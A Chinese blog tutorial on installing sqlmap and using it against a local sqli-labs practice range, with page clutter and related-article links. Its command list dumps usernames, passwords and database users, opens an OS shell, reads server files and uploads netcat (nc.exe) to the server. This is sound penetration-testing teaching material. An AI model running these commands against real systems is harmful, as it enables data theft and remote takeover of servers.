SQLMAP安装及详解

最新推荐文章于 2024-04-13 23:44:04 发布
最新推荐文章于 2024-04-13 23:44:04 发布
阅读量6.4k 收藏 11
点赞数 3
分类专栏: sqlmap注入 web安全 渗透测试 文章标签: 数据库 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51768842/article/details/123485836
版权

SQLMAP详解

​ sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。
sqlmap支持五种不同的注入模式:

  • 1 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;

  • 2 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;

  • 3 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;

  • 4 联合查询注入,可以使用union的情况下的注入;

  • 5 堆查询注入,可以同时执行多条语句的执行时的注入

    安装SQLMAP

sqlmap的安装需要python环境:https://www.python.org/

  1. 在python官方网站下载python版本(个人推荐python3.6/python3.7,因为相对而言其更加稳定)

注意:系统软件个人建议安装在c盘,毕竟以后配置环境相对而言方便一些。例如python默认的安装路径一般为:C:\Users\**\AppData\Local\Programs\Python\Python39

  1. 右键此电脑>>>选择属性>>点击高级系统设置>>点击环境变量>>选择系统变量的path>>点击path选择新建>>将第一步的python安装路径添加到其中。到此处python的环境就算搭建好了。

  2. 以上步骤读者可以参照下图所示

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. sqlmap下载及其安装:https://github.com/sqlmaproject/sqlmap

在这里插入图片描述

2.将sqlmap解压到python的安装目录下,并且把sqlmap目录添加到环境变量中操作如上配置python环境相似这里就不再赘述了。

环境配置验证:

打开cmd,输入python显示python相关的版本信息说明python环境配置完成。如下图所示:

在这里插入图片描述

输入sqlmap.py 如下图这说明配置成功:

在这里插入图片描述

注意本文的sqlmap案例皆为基于sqllab sql注入靶场实现。具体sqllab靶场的搭建请查看博主的其他相关文章。

sqlmap 入门

1.判断是否存在注入
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1
sqlmap.py -u “http://127.0.0.1/sql/Less-1/?id=1&uid=2” #参数大于1时加双引号

2.判断文本中的请求是否存在注入
sqlmap.py -r test.txt #-r一般在存在cookie注入时使用

3.查询当前用户下的所有数据库
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --dbs

4.获取数据库下的表名
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security --tables

5.获取表中的字段名
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users --columns

6.获取字段的内容
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users -C username,password --dump

7.获取数据库的所有用户
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --users

8.获取数据库用户的密码
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --password

9.获取当前网站数据库的名称
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --current-db

10.获取当前网站数据库的用户名称
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --current-user

sqlmap 进阶参数

1.--level=5:探测等级,1-5,默认为1,等级越高,payload越多,速度越慢。HTTP cookei在level为2时就会测试,HTTP User-Agent/Referer在level为3时就会测试。

2.--id-dba:当前用户是否为管理权限

3.--roles:列出数据库管理员角色,仅适用于当前数据库是Oracle的时候

4.--referer=https://www.baid.com :sqlmap可以在请求中伪造HTTP中的referer,当–level参数设定为3或者3以上的时候会尝试对referer注入

5.--sql-shell:运行自定义sql语句

6.--os-cmd,--os-shell:运行任意操作系统命令

7.--file-read "C:/example.exe":从数据库服务器中读取文件

8.sqlmap.py -u URL –file-write ”/software/nc.exe” –file-dest “C:/WINDOWS/Temp/nc.exe” 上传文件到数据库服务器中

注:文章内容是基于徐焱,李文轩,王东亚老师们编著的《web 安全攻防渗透测试实战指南》一书的内容经过提取,和添加笔者自己的理解而来。如果想在升入的了解相关的内容笔者建议还是购买纸质书籍效果更佳,谢谢

行 待
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一起学安全测试——用sqlmap对dvwa实现SQL注入测试
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏
Windows下Sqlmap环境安装教程详解
09-16
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
sqlmap注入命令详解
08-19
使用sqlmap进行数据库注入漏洞测试,高效,快速
sqlmap安装及使用教程
weixin_63033353的博客
07-28 4052
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
sqlmap安装及使用教程_sqlmap安装使用教程(1),网络安全面试题2024中高级
最新发布
2301_78146994的博客
04-13 751
如果你的电脑除了安装python2.7外还安装了其他版本,由于sqlmap不支持3以上版本,为了正常使用避免冲突,有两种方法:sqlmap官方下载地址:sqlmap:自动SQL注入和数据库接管工具下载压缩包,并解压到python2.7的目录下进入sqlmap文件夹,在此文件夹中打开控制台(可以在上方地址栏输入cmd回车快速打开)输入命令或者检验是否成功,出现如图所示界面就代表成功了。每次运行sqlmap时,都要进入到目录中打开cmd,比较麻烦,因此我们可以配置一种快捷的方式去打开。我们可以配置一个批处理文
sqlmap安装python2或python3都行)
weixin_42213694的博客
10-28 3232
sqlmap要在Python环境中使用,所以还要先下载安装配置好PythonPython下载安装(小白教程))。 注意:重点来了——网上无数的帖子和回答都说sqlmap一定要在py2环境中才能使用,完全不用,python3.6开始就已经可以支持sqlmap了,所以只要在官网中下载最新版本python即可。 一)sqlmap的下载网址:http://sqlmap.org/,如下图: 解压到安装Python的目录下,如下图: 为了后续每次操作时方便打开,我们对下载的sqlmap文件夹重命名为 sqlma
DVWA之暴力破解二(手动注入和使用sqlmap
cai_huaer的博客
04-19 869
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 4914
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
Sqlmap
mumuzi2的博客
02-25 378
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA通过攻略之SQL注入
勿山几已
05-24 6900
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2362
SQL注入漏洞
dvwa-sql注入-sqlmap用法
m0_64987233的博客
07-03 229
其中cookie在f12-network-刷新-headers里面。3.获取指定数据库表。
SQLMAP2018版本中文详解
05-13
sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化...
ibatis sqlmap配置详解
01-09
SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的70的工作量。Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL时使用的sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为...
sqlmap工具学习记
m0_70483044的博客
07-20 594
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
sqlmap出错:ImportError: No module named bz2
weixin_34054931的博客
06-21 1538
我在安装sqlmap的时候,需要python2.6以上版本的支持。当我安装python2.7后,在运行sqlmap时,报错了:ImportError: No module named bz2。 我python2.7的安装步骤: tarzxvfPython-2.7.tgz cdPython-2.7/ ./configure;make;makeinstall ...
sqlmap安装教程+遇到的错误及解决方法
weixin_51593721的博客
07-03 3010
sqlmap下载教程以及遇到的错误,电脑的python版本python2.7与python3.10。
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 1462
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa。
sqlmap代码详解
07-27
sqlmap是一款用于自动化SQL注入的工具。下面是对引用内容的解释: 引用\[1\]中的代码是使用sqlmap进行数据库表名的获取。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,-D参数指定了要操作的数据库名。 引用\[2\]中的代码是使用sqlmap执行SQL查询。其中,-u参数指定了目标URL,--sql-query参数指定了要执行的SQL查询语句,-v参数指定了详细程度为1。 引用\[3\]中的代码是使用sqlmap进行数据库名的获取,并将结果保存到日志文件中。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,--dbs参数指定了要获取数据库名,-o参数指定了保存日志的文件名,--resume参数用于恢复已保存的进度。 综上所述,sqlmap是一款功能强大的工具,可以用于自动化地进行SQL注入攻击,并提供了丰富的参数和选项来满足不同的需求。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap命令详解(最全版本)](https://blog.csdn.net/lkbzhj/article/details/126569453)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值